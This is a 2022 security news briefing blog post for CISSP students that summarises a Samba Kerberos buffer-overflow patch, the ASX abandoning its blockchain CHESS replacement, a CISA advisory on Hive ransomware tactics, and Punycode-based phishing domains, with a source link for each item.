Blog entry by Les Bell

Les Bell
by Les Bell - Friday, 18 November 2022, 7:51 AM
Anyone in the world

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Samba Project Releases Patch for Buffer Overflow

The Samba project has released a patch to fix a buffer overflow vulnerability, CVE-2022-42898. The vulnerability, in Samba's Heimdal Kerberos libraries, is enabled by an integer multiplication overflow when calculating how many bytes to allocate for a buffer into which a Privilege Attribute Certificate will be parsed. On a 32-bit system, this overflow will allow placement of 16-byte chunks of attacker-controlled data.

By submitting a Kerberos ticket, containing a carefully-crafted PAC to a non-Active Directory KDC, an attacker could get the PAC passed on to a service, within the service ticket.

The vulnerability does not affect 64-bit systems; however, a number of low-end NAS devices contain 32-bit implementations and so should be patched as soon as possible vendors release patches.

Uncredited, Samba Security Releases, web page, 15 November 2022. Available online at https://www.samba.org/samba/history/security.html.

ASX Halts Blockchain Project, Takes $A250 Million Hit

In a sign that blockchain technology is well down the back side of the hype cycle, the Australian Stock Exchange (ASX) has announced that it has halted its major project to replace CHESS (Clearing House Electronic Subregister System) with a blockchain-based system. The decision follows completion of an independent review conducted by Accenture, as well as its own internal assessment.

The Accenture review identified four underlying drivers which contribute to the challenges the project was facing:

  • Latency - while all distributed systems have inherent latency, the architecture makes it worse due to the round-trip data flow of submitting a transaction to the client node, then writing the data to the ledger, ditributing it back to the client nodes and to the CHESS replacement application.
  • Concurrency - contention arises when multiple in-flight transactions target the same data set and batching or grouping transactions still forces serialised processing for some workflows.
  • Batch Processing - The use of batch processing to deal with the concurrency issues, scaling and other non-functional issues  is limited by constraints which need further investigation
  • Technical Constraints - Batch processing is constrained by limits in the ledger API and VMware Blockchain used.

All in all, the current design contributes to challenges in achieving scalability, resiliency and supportability. Meanwhile, the existing CHESS application "remains secure and stable, and is performing well", with the ASX planning to continue to invest in its capacity and resilience. As the endless litany of cryptocurrency exchange collapses, rugpulls and other thefts and frauds continue to erode trust in the major blockchain application, one is left wondering whether blockchain isn't just a solution desperately searching for a problem.

ASX Market Announcements Office, ASX Will Reassess All Aspects of the CHESS Replacement Project and Derecognise Capitalised Software of $245-255 Million Pre-Tax in 1H23, market announcement, 17 November 2022. Available online at https://cdn-api.markitdigital.com/apiman-gateway/ASX/asx-research/1.0/file/2924-02599209-2A1414213?access_token=83ff96335c2d45a094df02a206a39ff4.

FBI, CISA, Department of Health and Human Services Warn of Hive Ransomware

A joint Cybersecurity Advisory issed by the US Cybersecurity & Infrastructure Security Agency provides details of the IOC's and TTP's that have been identified through FBI investigations as those of the Hive ransomware group.

To date, Hive actors have hit over 1,300 companies worldwide, netting a revenue of approximately $US100 million in ransomware payments, say the FBI, using the ransomware-as-a-service (RaaS) model in which they provide the malware and affiliates conduct the actual attacks. Since June 2021, these affiliates have targeted a wide range of private and public sector organizations, especially the healthcare and public health segment.

Initial intrusion vectors vary widely, depending on the affiliate involved; they include compromising remote access protocols such as RDP and VPN services. They have also bypassed multi-factor authentication and gained access to FortinOS servers by exploiting CVE-2020-12812, which allowed them to log in without a prompt for the FortiToken second factor by simply changing the case of the username. They have also used malmails and exploited MS Exchange vulnerabilities.

The Hive ransomware itself uses a variety of evasion techniques such as removing virus definitions and disabling antivirus programs, and also disables backups to impede recovery. Exfiltration is performed using a combination of Rclone and the Mega.nz cloud storage service.

The CISA advisory provides a full description, along with IOC's such as filenames, events, processes, IP addresses and the MITRE ATT&CK techniques. It also provides recommended mitigations.

Cybersecurity & Infrastructure Security Agency, #StopRansomware: Hive Ransomware, Alert (AA22-321A), 17 November 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-321a.

Phishing Domains Use Puneycode to Escape Notice

A nice piece from infosec blogger Brian Krebs describes how the Disneyland Team financial cybercrime group has created multiple typosquatting domains which are near-indistinguishable from the real domains by using Punycode, the Internet standard that allows non-Latin alphabets, such as Cyrillic, in domain names.

By using accented letters with accents such as acutes, graves, umlauts - especially visually-unintrusive single dots below letters such as 'a' and 'e' - the group has been able to direct victims to domains which, in their browser URL bar, are virtually undistinguishable from the correct address.

Krebs, Brian, Disneyland Malware Team: It's a Puny World After All, blog post, 16 November 2022. Available online at https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Creative Commons License TLP:CLEAR Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Tags: